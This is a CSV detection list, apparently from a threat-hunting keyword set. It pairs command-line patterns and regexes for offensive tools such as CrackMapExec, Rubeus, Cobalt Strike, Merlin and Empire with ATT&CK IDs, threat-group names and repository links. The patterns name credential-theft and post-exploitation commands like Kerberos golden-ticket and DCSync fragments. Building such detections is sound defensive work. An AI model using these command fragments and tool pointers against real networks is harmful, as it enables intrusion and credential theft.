"* get_keystrokes*",".{0,1000}\sget_keystrokes.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1308"
"* get_netdomaincontroller*",".{0,1000}\sget_netdomaincontroller.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1309"
"* get_netrdpsession*",".{0,1000}\sget_netrdpsession.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1310"
"* get_rooot *",".{0,1000}\sget_rooot\s.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","1311"
"* get_timedscreenshot*",".{0,1000}\sget_timedscreenshot.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1312"
"* Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' *",".{0,1000}\sGet\-ADReplAccount\s\-SamAccountName\s\'AZUREADSSOACC\$\'\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","1313"
"* GetAppLockerPolicies*",".{0,1000}\sGetAppLockerPolicies.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","1314"
"* --get-backdoor*",".{0,1000}\s\-\-get\-backdoor.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","1316"
"* Get-DomainController | select Name,OSversion,IPAddress |fl*",".{0,1000}\sGet\-DomainController\s\|\sselect\sName,OSversion,IPAddress\s\|fl.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","1317"
"* Get-DomainGPO -Identity ""{AB306569-220D-43FF-B03B-83E8F4EF8081}""*",".{0,1000}\sGet\-DomainGPO\s\-Identity\s\""\{AB306569\-220D\-43FF\-B03B\-83E8F4EF8081\}\"".{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","1318"
"* Get-GPPPassword.ps1*",".{0,1000}\sGet\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1319"
"* Get-InfectedThread.ps1*",".{0,1000}\sGet\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1320"
"* Get-InjectedThread.ps1*",".{0,1000}\sGet\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1321"
"* GetLsassPid*",".{0,1000}\sGetLsassPid.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","1322"
"* Get-NetNTLM.ps1*",".{0,1000}\sGet\-NetNTLM\.ps1.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","1323"
"* GetNPUsers.py*",".{0,1000}\sGetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1324"
"* Get-OSTokenInformation.ps1*",".{0,1000}\sGet\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1325"
"* GetPasswords.ps1*",".{0,1000}\sGetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1326"
"* getprivs.c *",".{0,1000}\sgetprivs\.c\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1327"
"* getprivs.o *",".{0,1000}\sgetprivs\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1328"
"* Get-ScheduledTaskComHandler.ps1*",".{0,1000}\sGet\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1329"
"* Get-ServiceFromRegistry -Name Spooler*",".{0,1000}\sGet\-ServiceFromRegistry\s\-Name\sSpooler.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","1330"
"* Get-SMBSigning.ps1*",".{0,1000}\sGet\-SMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","1331"
"* Get-SpoolStatus.ps1*",".{0,1000}\sGet\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","1332"
"* --get-syscallstub *",".{0,1000}\s\-\-get\-syscallstub\s.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","1333"
"* Get-TGSCipher.ps1*",".{0,1000}\sGet\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1334"
"* Ghauri is going to use the current database to enumerate table(s) entries*",".{0,1000}\sGhauri\sis\sgoing\sto\suse\sthe\scurrent\sdatabase\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","1335"
"* GhostDriver.exe*",".{0,1000}\sGhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","1336"
"* ghostdriver.sys*",".{0,1000}\sghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","1337"
"* GhostTask.c *",".{0,1000}\sGhostTask\.c\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","1338"
"* -GHUser * -GHRepo *",".{0,1000}\s\-GHUser\s.{0,1000}\s\-GHRepo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-ExfilDataToGitHub.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1339"
"* giop-info.nse*",".{0,1000}\sgiop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1341"
"* github repos list --org*",".{0,1000}\sgithub\srepos\slist\s\-\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","1342"
"* github repos list --user *",".{0,1000}\sgithub\srepos\slist\s\-\-user\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","1343"
"* give-dcsync*",".{0,1000}\sgive\-dcsync.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","1344"
"* give-genericall * -target-sid *",".{0,1000}\sgive\-genericall\s.{0,1000}\s\-target\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","1345"
"* gkrellm-info.nse*",".{0,1000}\sgkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1346"
"* GlllPowerLoader.py*",".{0,1000}\sGlllPowerLoader\.py.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","1347"
"* gmailC2.exe*",".{0,1000}\sgmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","1348"
"* --gmsa-decrypt-lsa *",".{0,1000}\s\-\-gmsa\-decrypt\-lsa\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1349"
"* go build -o padre .*",".{0,1000}\sgo\sbuild\s\-o\spadre\s\..{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","1350"
"* golden * /badpwdcount*",".{0,1000}\sgolden\s.{0,1000}\s\/badpwdcount.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1351"
"* golden * /ldap *",".{0,1000}\sgolden\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1352"
"* golden * /user:*",".{0,1000}\sgolden\s.{0,1000}\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1353"
"* goldenPac.py *",".{0,1000}\sgoldenPac\.py\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","1354"
